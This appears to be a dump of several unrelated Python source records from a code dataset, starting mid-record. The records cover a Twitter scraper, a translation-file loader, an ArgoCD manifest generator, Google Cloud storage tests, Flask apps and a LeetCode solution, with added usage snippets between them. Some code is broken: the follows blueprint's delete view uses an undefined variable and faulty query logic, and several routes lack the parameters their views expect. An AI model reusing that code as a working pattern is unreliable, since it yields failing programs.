headers, json_response): #función para obtener todos los tweets de cada consulta\n df_res = create_df(json_response) #paso como parámetro\n print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n while 'next_token' in json_response[\"meta\"]:\n # Guarda el token para usarlo en la siguiente llamada\n next_token = json_response['meta']['next_token']\n if ('data' in json_response) and len(df_res)< 499500:\n json_response = connect_to_endpoint(url[0], headers, url[1], next_token)\n df_aux = create_df(json_response)\n df_res = pd.concat([df_res,df_aux])\n time.sleep(2) #Se agrega un time.sleep () entre llamadas para asegurarse de que no solo está enviando spam a la API con solicitudes.\n print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n else:\n break\n return df_res \n","sub_path":"twitter_api.py","file_name":"twitter_api.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
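+A possible driver for the helpers in the record above, assuming a bearer token with access to the full-archive search endpoint; the keyword and date range are placeholders.
+
+```python
+from twitter_api import auth, create_headers, create_url, connect_to_endpoint, create_df_final
+
+headers = create_headers(auth())
+url = create_url('python lang:en', '2021-01-01T00:00:00Z', '2021-01-31T00:00:00Z', max_results=500)
+first_page = connect_to_endpoint(url[0], headers, url[1])
+df = create_df_final(url, headers, first_page)  # follows next_token pagination with a 2s pause
+df.to_csv('tweets.csv', index=False)
+```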
+{"seq_id":"29870122","text":"# -*- coding: utf-8 -*-\n\"\"\"\n severus.language\n ----------------\n\n Provides language data wrapper.\n\n :copyright: 2020 Giovanni Barillari\n :license: BSD-3-Clause\n\"\"\"\n\nfrom __future__ import annotations\n\nimport json\nimport re\n\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple, Union\nfrom yaml import SafeLoader as ymlLoader, load as ymlload\n\nfrom .datastructures import GroupData\n\n\nclass Language:\n __slots__ = ['_sources', '_strings', '_groups', '_encoding', 'get']\n _re_nkey = re.compile(r'n\\d+')\n\n def __init__(\n self,\n data_path: Path,\n encoding: str = 'utf8',\n filename_prefix: bool = True,\n watch_changes: bool = False\n ):\n self._sources: List[Dict[str, Any]] = []\n self._strings: Dict[str, str] = {}\n self._groups: Dict[Union[int, str], str] = {}\n self._encoding: str = encoding\n self.get = self._get_reload if watch_changes else self._get_static\n self._load_sources(data_path, filename_prefix)\n\n def _build_key(self, key: str, prefix: Optional[str] = None):\n return f'{prefix}.{key}' if prefix else key\n\n def _load_sources(\n self,\n path: Path,\n filename_prefix: bool = True\n ):\n sources, filename_prefix_applicable = [], False\n if path.is_dir():\n filename_prefix_applicable = filename_prefix\n for file_path in path.iterdir():\n if file_path.suffix in [\n '.json', '.yml', '.yaml'\n ]:\n sources.append(file_path)\n elif path.is_file():\n sources.append(path)\n for source in sources:\n self._sources.append({\n 'path': source,\n 'mtime': source.stat().st_mtime,\n 'prefix': filename_prefix_applicable\n })\n self._load_source(source, filename_prefix_applicable)\n\n def _load_source(\n self,\n path: Path,\n filename_prefix: bool = False\n ):\n ext = path.suffix\n if ext == '.json':\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = json.loads(f.read())\n elif ext in ['.yml', '.yaml']:\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = ymlload(f.read(), Loader=ymlLoader)\n else:\n raise RuntimeError(f'Invalid source format: {path}')\n prefix = filename_prefix and path.stem or None\n self._load_data(data, prefix)\n\n def _load_data(\n self,\n data: Dict[str, Union[Dict, str]],\n prefix: Optional[str] = None\n ):\n for key, val in data.items():\n if isinstance(val, str):\n self._strings[self._build_key(key, prefix)] = val\n continue\n keyset = set(val.keys()) - {'_'}\n if len(self._re_nkey.findall(','.join(keyset))) == len(keyset):\n self._groups[self._build_key(key, prefix)] = GroupData(val)\n else:\n self._load_data(val, self._build_key(key, prefix))\n\n def _ensure_updated_sources(self):\n for source in self._sources:\n mtime = source['path'].stat().st_mtime\n if mtime != source['mtime']:\n source['mtime'] = mtime\n self._load_source(source['path'], source['prefix'])\n\n def _get_reload(self, text: str) -> Tuple[str, Dict[int, str]]:\n self._ensure_updated_sources()\n return self._strings.get(text, text), self._groups.get(text, {})\n\n def _get_static(self, text: str) -> Tuple[str, Dict[int, str]]:\n return self._strings.get(text, text), self._groups.get(text, {})\n","sub_path":"severus/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"283628913","text":"import base64\nimport hashlib\nimport os\n\nfrom kapitan.cached import args\nfrom kapitan.inputs.kadet import BaseObj, inventory\nfrom kapitan.utils import render_jinja2_file\n\nsearch_paths = args.get(\"search_paths\")\n\nfrom . import k8s\n\n\ndef j2(filename, ctx):\n return render_jinja2_file(filename, ctx, search_paths=search_paths)\n\n\ninv = inventory(lazy=True)\n\n\ndef merge(source, destination):\n for key, value in source.items():\n if isinstance(value, dict):\n node = destination.setdefault(key, value)\n if node is None:\n destination[key] = value\n else:\n merge(value, node)\n else:\n destination[key] = destination.setdefault(key, value)\n\n return destination\n\n\nclass ArgoCDAppProject(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"AppProject\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n self.kwargs.finalizers = list(\"resources-finalizer.argocd.argoproj.io\")\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_project = self.kwargs.argocd_project\n\n self.add_annotations(argocd_project.get(\"annotations\", {}))\n self.add_labels(argocd_project.get(\"labels\", {}))\n\n # Allow manifests to deploy from any Git repos\n if argocd_project.source_repos:\n self.root.spec.sourceRepos = argocd_project.source_repos\n\n # Only permit applications to deploy to the namespace in the same cluster\n if argocd_project.destinations:\n self.root.spec.destinations = argocd_project.destinations\n\n # Deny all cluster-scoped resources from being created, except for Namespace\n if argocd_project.cluster_resource_whitelist:\n self.root.spec.clusterResourceWhitelist = (\n argocd_project.cluster_resource_whitelist\n )\n\n # Allow all namespaced-scoped resources to be created, except for ResourceQuota, LimitRange, NetworkPolicy\n if argocd_project.namespace_resource_blacklist:\n self.root.spec.namespaceResourceBlacklist = (\n argocd_project.namespace_resource_blacklist\n )\n\n # Deny all namespaced-scoped resources from being created, except for Deployment and StatefulSet\n if argocd_project.namespace_resource_whitelist:\n self.root.spec.namespaceResourceWhitelist = (\n argocd_project.namespace_resource_whitelist\n )\n\n # Enables namespace orphaned resource monitoring.\n if argocd_project.orphaned_resources:\n self.root.spec.orphanedResources = argocd_project.orphaned_resources\n\n # Roles\n if argocd_project.roles:\n self.root.spec.roles = argocd_project.roles\n\n\nclass ArgoCDApplication(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"Application\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n\n # self.kwargs.finalizers = list('resources-finalizer.argocd.argoproj.io')\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_application = self.kwargs.argocd_application\n\n self.add_annotations(argocd_application.get(\"annotations\", {}))\n self.add_labels(argocd_application.get(\"labels\", {}))\n\n # The project the argocd_application belongs to.\n self.root.spec.project = argocd_application.project\n\n # The destination in which Namespace the application should be deployed\n 
self.root.spec.destination = argocd_application.destination\n\n # Source of the application manifests\n if argocd_application.source:\n self.root.spec.source = argocd_application.source\n\n # Sync policy\n if argocd_application.sync_policy:\n self.root.spec.syncPolicy = argocd_application.sync_policy\n\n # Ignore differences at the specified json pointers\n if argocd_application.ignore_differences:\n self.root.spec.ignoreDifferences = argocd_application.ignore_differences\n\n\n# The following classes are required to generate Secrets + ConfigMaps\n# TODO: Imported from k8s-generator\nclass SharedConfig:\n \"\"\"Shared class to use for both Secrets and ConfigMaps classes.\n\n contain anything needed by both classes, so that their behavious is basically the same.\n Each subclass will then implement its own way of adding the data depending on their implementation.\n \"\"\"\n\n @staticmethod\n def encode_string(unencoded_string):\n return base64.b64encode(unencoded_string.encode(\"ascii\")).decode(\"ascii\")\n\n def setup_metadata(self):\n self.add_namespace(inv.parameters.argocd_namespace)\n self.add_annotations(self.config.annotations)\n self.add_labels(self.config.labels)\n\n self.items = self.config[\"items\"]\n try:\n if isinstance(self, ConfigMap):\n globals = (\n inv.parameters.generators.manifest.default_config.globals.config_maps\n )\n else:\n globals = (\n inv.parameters.generators.manifest.default_config.globals.secrets\n )\n self.add_annotations(globals.get(\"annotations\", {}))\n self.add_labels(globals.get(\"labels\", {}))\n except AttributeError:\n pass\n\n self.versioning(self.config.get(\"versioned\", False))\n\n def add_directory(self, directory, encode=False):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n if directory and os.path.isdir(directory):\n for filename in os.listdir(directory):\n with open(f\"{directory}/{filename}\", \"r\") as f:\n file_content = f.read()\n self.add_item(\n filename,\n file_content,\n request_encode=encode,\n stringdata=stringdata,\n )\n\n def add_data(self, data):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n\n for key, spec in data.items():\n encode = spec.get(\"b64_encode\", False)\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def add_string_data(self, string_data, encode=False):\n stringdata = True\n\n for key, spec in string_data.items():\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def versioning(self, enabled=False):\n if enabled:\n self.hash = hashlib.sha256(str(self.root.to_dict()).encode()).hexdigest()[\n :8\n ]\n self.root.metadata.name += f\"-{self.hash}\"\n\n\n# TODO: Imported from k8s-generator\nclass ConfigMap(k8s.Base, SharedConfig):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"ConfigMap\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = request_encode\n\n self.root[\"data\"][key] = self.encode_string(value) if encode else value\n\n\n# TODO: Imported from k8s-generator\nclass 
ComponentConfig(ConfigMap, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n\n self.setup_metadata()\n self.add_data(self.config.data)\n self.add_directory(self.config.directory, encode=False)\n\n\nclass Secret(k8s.Base):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"Secret\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = not stringdata and request_encode\n field = \"stringData\" if stringdata else \"data\"\n self.root[field][key] = self.encode_string(value) if encode else value\n\n\nclass ComponentSecret(Secret, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n self.root.type = self.config.get(\"type\", \"Opaque\")\n\n self.setup_metadata()\n if self.config.data:\n self.add_data(self.config.data)\n if self.config.string_data:\n self.add_string_data(self.config.string_data)\n self.add_directory(self.config.directory, encode=True)\n\n\n# This function renderes an ArgoCD-AppProject\ndef generate_argocd_appproject(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_projects = inv.parameters.argocd_projects\n for name in argocd_projects.keys():\n argocd_project = ArgoCDAppProject(\n name=name, argocd_project=argocd_projects[name]\n )\n\n obj.root[\"{}-argo-appproject\".format(name)] = argocd_project\n\n return obj\n\n\n# This function renderes an ArgoCD-Application\ndef generate_argocd_application(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_applications = inv.parameters.argocd_applications\n for name in argocd_applications.keys():\n argocd_application = ArgoCDApplication(\n name=name, argocd_application=argocd_applications[name]\n )\n\n obj.root[\"{}-argo-application\".format(name)] = argocd_application\n\n return obj\n\n\n# This function renderes an Shared-ConfigMaps + Secrets\ndef generate_resource_manifests(input_params):\n obj = BaseObj()\n\n for secret_name, secret_spec in inv.parameters.generators.argocd.secrets.items():\n name = secret_spec.get(\"name\", secret_name)\n secret = ComponentSecret(name=name, config=secret_spec)\n obj.root[f\"{name}\"] = secret\n\n for config_name, config_spec in inv.parameters.generators.argocd.configs.items():\n name = config_spec.get(\"name\", config_name)\n config = ComponentConfig(name=name, config=config_spec)\n obj.root[f\"{name}\"] = config\n\n return obj\n\n\n# This function renderes all previous defined functions and returns\ndef generate_manifests(input_params):\n all_manifests = BaseObj()\n\n argocd_project_manifests = generate_argocd_appproject(input_params)\n argocd_application_manifests = generate_argocd_application(input_params)\n resource_manifests = generate_resource_manifests(input_params)\n\n all_manifests.root.update(argocd_project_manifests.root)\n all_manifests.root.update(argocd_application_manifests.root)\n all_manifests.root.update(resource_manifests.root)\n\n return all_manifests\n\n\ndef main(input_params):\n whitelisted_functions = [\"generate_manifests\"]\n function = input_params.get(\"function\", \"generate_manifests\")\n if function in whitelisted_functions:\n return 
globals()[function](input_params)\n","sub_path":"components/generators/argocd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
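+For orientation, a sketch of the kapitan inventory shape the generators above read; the key names come from the code, every value is illustrative only.
+
+```python
+# parameters consumed via inv.parameters in the generator above (illustrative values)
+parameters = {
+    "argocd_namespace": "argocd",
+    "argocd_projects": {
+        "team-a": {
+            "source_repos": ["https://github.com/example/deployments.git"],
+            "destinations": [
+                {"server": "https://kubernetes.default.svc", "namespace": "team-a"}
+            ],
+        }
+    },
+    "argocd_applications": {
+        "guestbook": {
+            "project": "team-a",
+            "destination": {"server": "https://kubernetes.default.svc", "namespace": "team-a"},
+            "source": {"repoURL": "https://github.com/example/deployments.git", "path": "guestbook"},
+        }
+    },
+    "generators": {"argocd": {"secrets": {}, "configs": {}}},
+}
+```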
+{"seq_id":"360408443","text":"# -*- coding: utf-8 -*- #\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for googlecloudsdk.api_lib.storage.storage_api.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom apitools.base.py.testing import mock as api_mock\n\nfrom googlecloudsdk.api_lib.storage import storage_api\nfrom googlecloudsdk.api_lib.storage import storage_util\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.calliope import exceptions\nfrom tests.lib import sdk_test_base\nfrom tests.lib import test_case\nfrom tests.lib.apitools import http_error\nfrom tests.lib.surface.app import cloud_storage_util\n\n\nclass GetObjectTest(sdk_test_base.SdkBase):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://mybucket/myobject')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n def testGetObject(self):\n self.apitools_client.objects.Get.Expect(\n self.storage_msgs.StorageObjectsGetRequest(\n bucket='mybucket', object='myobject'),\n self.storage_msgs.Object(name='myobject'))\n\n self.assertEqual(\n self.storage_client.GetObject(self._OBJECT),\n self.storage_msgs.Object(name='myobject'))\n\n\nclass CopyFileTest(sdk_test_base.SdkBase):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = self.Touch(\n self.temp_path, self.object_name, contents='somecontentshere')\n self.file_size = os.path.getsize(self.local_path)\n self.insert_request = self.storage_msgs.StorageObjectsInsertRequest(\n bucket=self._BUCKET.bucket,\n name=self.target_path,\n object=self.storage_msgs.Object(size=self.file_size)\n )\n\n def testSuccess(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n self.storage_msgs.Object(size=self.file_size)\n )\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n exception=exception\n )\n\n with self.assertRaisesRegex(\n exceptions.BadFileException,\n r'Could not copy \\[{}\\] to \\[{}\\]. 
Please retry: Invalid request API '\n r'reason: Invalid request.'.format(\n re.escape(self.local_path), self.target_path)):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testSizeMismatch(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=self.file_size - 1)\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n\nclass CopyFileFromGCSTest(sdk_test_base.WithFakeAuth):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = os.path.join(self.temp_path, self.object_name)\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket=self._BUCKET.bucket,\n object=self.target_path)\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n self.storage_msgs.Object(size=0))\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testSizeMismatch(self):\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=-1))\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n\nclass ReadObjectTest(sdk_test_base.WithFakeAuth):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://bucket/object')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket='bucket',\n object='object')\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # 
a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.assertEqual(\n self.storage_client.ReadObject(self._OBJECT).read(),\n b'')\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.ReadObject(self._OBJECT)\n\n\nclass ListBucketTest(cloud_storage_util.WithGCSCalls):\n\n _BUCKET_NAME = 'testbucket'\n\n _SHA1_SUMS = {\n 'content': '040f06fd774092478d450774f5ba30c5da78acc8',\n 'content2': '6dc99d4757bcb35eaaf4cd3cb7907189fab8d254',\n 'content3': '32c5ff3108bcea43b1c4826d66f43a3ae570e663'\n }\n\n def SetUp(self):\n self.bucket = storage_util.BucketReference.FromBucketUrl(\n 'gs://{0}/'.format(self._BUCKET_NAME))\n self.storage_client = storage_api.StorageClient()\n\n def testListBucket(self):\n self.ExpectList([('a', 'content'), ('b', 'content'), ('c', 'content2')])\n\n names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n self.assertEqual(\n names,\n set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2']]))\n\n def testListBucketMultiplePages(self):\n self.ExpectListMulti([\n [('a', 'content'), ('b', 'content')],\n [('c', 'content2'), ('d', 'content3')]])\n names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n self.assertEqual(\n names,\n set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2'],\n self._SHA1_SUMS['content3']]))\n\n\nclass DeleteBucketTest(test_case.TestCase):\n\n _BUCKET_NAME = 'testbucket'\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n\n def testDeleteBucket(self):\n bucket = storage_util.BucketReference.FromBucketUrl(\n 'gs://{0}/'.format(self._BUCKET_NAME))\n self.apitools_client.buckets.Delete.Expect(\n self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteRequest(\n bucket=self._BUCKET_NAME),\n self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteResponse()\n )\n\n self.storage_client.DeleteBucket(bucket)\n","sub_path":"google-cloud-sdk/lib/tests/unit/api_lib/storage/storage_api_test.py","file_name":"storage_api_test.py","file_ext":"py","file_size_in_byte":10181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
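+A hedged application-side sketch of the `StorageClient` surface exercised by these tests; the bucket and paths are placeholders, and the call signatures mirror the tests above.
+
+```python
+from googlecloudsdk.api_lib.storage import storage_api, storage_util
+
+client = storage_api.StorageClient()
+bucket = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')
+# Upload a local file, then read the object back.
+client.CopyFileToGCS(bucket, '/tmp/report.csv', 'reports/report.csv')
+obj = storage_util.ObjectReference.FromUrl('gs://mybucket/reports/report.csv')
+print(client.ReadObject(obj).read())
+```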
+{"seq_id":"619496392","text":"from random import sample\r\nfrom flask import Flask, render_template\r\nfrom data import *\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef main():\r\n random_tours = {}\r\n rand_list = sample(range(1,tours.__len__()), 6) #генерирую 6 случайных значений без повторений\r\n for i in rand_list:\r\n random_tours[i] = tours[i]\r\n\r\n template_context = dict(title=title, subtitle=subtitle, description=description, tours=random_tours, departures=departures)\r\n output = render_template(\"index.html\", **template_context)\r\n return output\r\n\r\n@app.route('/departures/')\r\ndef show_dep(departure):\r\n\r\n tours_by_dep = {}\r\n for ind, tour in tours.items():\r\n if tour['departure'] == departure:\r\n tours_by_dep[ind] = tour\r\n\r\n tours_count = tours_by_dep.__len__()\r\n\r\n min_price = min(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n max_price = max(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n min_days = min(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n max_days = max(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n\r\n template_context = dict(departures=departures, title=title, departure=departure, selected_tours=tours_by_dep, tours_count=tours_count, min_price=min_price, max_price=max_price, min_days=min_days, max_days=max_days)\r\n output = render_template(\"departure.html\", **template_context)\r\n return output\r\n\r\n@app.route('/tours/')\r\ndef show_tour(id):\r\n tour = tours[int(id)]\r\n output = render_template(\"tour.html\", departures=departures, title=title, tour=tour)\r\n return output\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"254221254","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n给定一个正整数 n ,输出外观数列的第 n 项。\n\n「外观数列」是一个整数序列,从数字 1 开始,序列中的每一项都是对前一项的描述。\n\n你可以将其视作是由递归公式定义的数字字符串序列:\n\ncountAndSay(1) = \"1\"\ncountAndSay(n) 是对 countAndSay(n-1) 的描述,然后转换成另一个数字字符串。\n前五项如下:\n\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n第一项是数字 1 \n描述前一项,这个数是 1 即 “ 一 个 1 ”,记作 \"11\"\n描述前一项,这个数是 11 即 “ 二 个 1 ” ,记作 \"21\"\n描述前一项,这个数是 21 即 “ 一 个 2 + 一 个 1 ” ,记作 \"1211\"\n描述前一项,这个数是 1211 即 “ 一 个 1 + 一 个 2 + 二 个 1 ” ,记作 \"111221\"\n要 描述 一个数字字符串,首先要将字符串分割为 最小 数量的组,每个组都由连续的最多 相同字符 组成。然后对于每个组,先描述字符的数量,然后描述字符,形成一个描述组。要将描述转换为数字字符串,先将每组中的字符数量用数字替换,再将所有描述组连接起来。\n\n例如,数字字符串 \"3322251\" 的描述如下图:\n\n\n \n\n示例 1:\n\n输入:n = 1\n输出:\"1\"\n解释:这是一个基本样例。\n示例 2:\n\n输入:n = 4\n输出:\"1211\"\n解释:\ncountAndSay(1) = \"1\"\ncountAndSay(2) = 读 \"1\" = 一 个 1 = \"11\"\ncountAndSay(3) = 读 \"11\" = 二 个 1 = \"21\"\ncountAndSay(4) = 读 \"21\" = 一 个 2 + 一 个 1 = \"12\" + \"11\" = \"1211\"\n \n\n提示:\n\n1 <= n <= 30\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/count-and-say\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n \n\n提示:\n\n1 <= n <= 30\n\n\n固定的数组的生成:\n- 第一个数字固定为1\n- 后面的数字依次为上一个数字序列的读法\n\n思路:\n\"\"\"\n\nimport doctest\n\n\nclass Solution:\n \"\"\"\n >>> s = Solution()\n >>> s.countAndSay(1)\n '1'\n >>> s.countAndSay(4)\n '1211'\n \"\"\"\n\n def countAndSay(self, n: int) -> str:\n s = \"1\"\n # 第一次遍历一次次的生成\n for j in range(1, n):\n t = s[0]\n tmp = \"\"\n count = 0 # 统计重复出现的数字的个数\n # 用来遍历每一次的数字,统计其读法\n for i in range(0, len(s), 1):\n if t == s[i]:\n count += 1\n else:\n tmp = tmp + str(count) + t\n t = s[i]\n count = 1\n if i == len(s) - 1:\n tmp = tmp + str(count) + t # 将结果合并\n s = tmp\n return s\n\n\nif __name__ == \"__main__\":\n doctest.testmod()\n","sub_path":"algorithms/leetcode/medium/0038_外观数列.py","file_name":"0038_外观数列.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"103194456","text":"from flask import Blueprint, render_template, request, url_for, redirect, flash\nfrom models.user import User\nfrom models.images import Image\nfrom models.following import Following\nfrom flask_login import current_user\n\nfollows_blueprint = Blueprint(\"follows\",\n __name__,\n template_folder='templates')\n\n\n@follows_blueprint.route('/', methods=['POST'])\ndef create(idol_id):\n idol = User.get_or_none(User.id == idol_id)\n\n if not idol:\n flash('No user found with this id')\n return redirect(url_for('sessions.index'))\n # modify this to show homepage HOME in sessions\n\n new_follow = Following(fan_id=current_user.id, idol_id=idol.id)\n\n if not new_follow.save():\n flash('Error in following this user', 'warning')\n return redirect(url_for('users.show', username=idol.username))\n\n else:\n flash(f'You are now following {idol.username}')\n return redirect(url_for('users.show', username=idol.username))\n\n flash('Following request has sent ! Please wait for approval.')\n\n\n@follows_blueprint.route('//delete', methods=['POST'])\ndef delete(idol_id):\n follow = Following.get_or_none(Following.idol_id == idol.id) and (\n Following.fan_id == current_user.id)\n\n if follow.delete_instance():\n flash(f'You have unfollowed {follow.idol.username}')\n return redirect(url_for('users.show', username=follow.idol.username))\n","sub_path":"instagram_web/blueprints/follows/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
